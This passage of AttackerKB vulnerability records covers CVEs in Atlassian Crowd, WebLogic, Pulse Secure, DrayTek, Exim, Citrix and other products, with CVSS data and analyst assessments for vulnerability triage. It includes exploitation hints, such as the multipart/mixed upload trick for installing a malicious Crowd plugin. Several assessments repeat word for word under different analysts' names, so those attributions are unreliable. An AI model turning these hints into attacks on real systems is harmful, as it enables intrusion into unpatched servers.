"vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": 
"2021-08-12T22:50:36", "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T00:00:00", "type": "attackerkb", "title": "CVE-2019-11580", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-07-24T00:00:00", "id": "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "href": "https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:32:31", "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 15, 2019 5:39pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. 
Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**busterb** at August 13, 2019 6:10pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different 
`multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an 
SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed 
Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-02-13T00:00:00", "type": "attackerkb", "title": "Atlassian Crowd: pdkinstall development plugin incorrectly enabled (CVE-2019-11580)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-02-13T00:00:00", "id": "AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "href": "https://attackerkb.com/topics/BriLAQlFp1/atlassian-crowd-pdkinstall-development-plugin-incorrectly-enabled-cve-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:39", "description": "The WLS Security component in Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, and 12.2.1.0 allows remote attackers to execute arbitrary commands via a crafted serialized Java object in T3 protocol traffic to TCP port 7001, related to oracle_common/modules/com.bea.core.apache.commons.collections.jar. 
NOTE: the scope of this CVE is limited to the WebLogic Server product.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:52pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2015-11-18T00:00:00", "type": "attackerkb", "title": "CVE-2015-4852", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-4852"], "modified": "2020-07-30T00:00:00", "id": "AKB:71A48C9F-C37B-4C1A-AD30-456EF1B66CF9", "href": "https://attackerkb.com/topics/UBKuPZwldv/cve-2015-4852", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:40", "description": "Adobe ColdFusion Update 5 and earlier versions, ColdFusion 11 Update 13 and earlier versions have an exploitable Deserialization of Untrusted Data vulnerability. 
Successful exploitation could lead to arbitrary code execution.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:50pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-05-19T00:00:00", "type": "attackerkb", "title": "CVE-2018-4939", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4939"], "modified": "2020-09-02T00:00:00", "id": "AKB:FDF5A3A7-D224-432D-A61A-88CFCB4B9799", "href": "https://attackerkb.com/topics/Zt4RJnPnpD/cve-2018-4939", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:32", "description": "DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to 
the cgi-bin/mainfunction.cgi URI. This issue has been fixed in Vigor3900/2960/300B v1.5.1.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:10pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-01T00:00:00", "type": "attackerkb", "title": "CVE-2020-8515", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8515"], "modified": "2020-06-05T00:00:00", "id": "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "href": "https://attackerkb.com/topics/OTC0EHe2YO/cve-2020-8515", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T08:58:18", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the 
FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s relatively easy these days to exploit serialization vulnerabilities with ysoserial/ysoserial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s relatively easy these days to exploit serialization vulnerabilities with ysoserial/ysoserial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2023-10-06T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:43:43", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:11pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\n**hrbrmstr** at May 12, 2020 7:55pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. 
If not patched, likely wrecked.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-08T00:00:00", "type": "attackerkb", "title": "CVE-2019-11510", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2023-10-06T00:00:00", "id": "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "href": "https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:18:30", "description": "Exim SMTP email server (versions before 4.90) are vulnerable to remote code execution via a vulnerability in Base64 decoding.\n\n \n**Recent assessments:** \n \n**asoto-r7** at June 25, 2019 6:25pm UTC reported:\n\nThere are a few PoCs for this one. Exim is a bear to setup and I wouldn\u2019t be shocked to find unpatched servers because sysadmins don\u2019t want to touch them. 
Since they\u2019d be Internet-accessible, there\u2019s a lot of attacker utility here for the small population that uses Exim.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-08T00:00:00", "type": "attackerkb", "title": "Exim SMTP server RCE via base64d", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-6789"], "modified": "2020-02-13T00:00:00", "id": "AKB:63C1E977-B118-475C-8C47-1046B294E1BA", "href": "https://attackerkb.com/topics/s2eAU0s76p/exim-smtp-server-rce-via-base64d", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T07:43:34", "description": "Multiple vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. 
These vulnerabilities, if exploited, could result in a number of security issues .\n\n \n**Recent assessments:** \n \n**ccondon-r7** at July 10, 2020 11:15pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**busterb** at July 10, 2020 11:17pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\n**gwillcox-r7** at October 20, 2020 5:53pm UTC reported:\n\nActive exploitation targeting recently published Citrix ADC vulns as of July 9, according to SANS ISC: <https://isc.sans.edu/forums/diary/Active+Exploit+Attempts+Targeting+Recent+Citrix+ADC+Vulnerabilities+CTX276688/26330/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-07-09T00:00:00", "type": "attackerkb", "title": "CTX276688: Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, 
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8187", "CVE-2020-8190", "CVE-2020-8191", "CVE-2020-8193", "CVE-2020-8194", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8197", "CVE-2020-8198", "CVE-2020-8199"], "modified": "2020-07-09T00:00:00", "id": "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "href": "https://attackerkb.com/comments/7cdfb3cc-0c4d-43e2-b2d5-88dca8befba8", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:33", "description": "The Symantec Messaging Gateway before 10.6.3-267 can encounter an issue of remote code execution, which describes a situation whereby an individual may obtain the ability to execute commands remotely on a target machine or in a target process. In this type of occurrence, after gaining access to the system, the attacker may attempt to elevate their privileges.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 7:08pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-08-11T00:00:00", "type": "attackerkb", "title": "CVE-2017-6327", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6327"], "modified": "2020-07-23T00:00:00", "id": "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "href": "https://attackerkb.com/topics/b3My5ZDXcf/cve-2017-6327", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:13:38", "description": "The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:54pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 
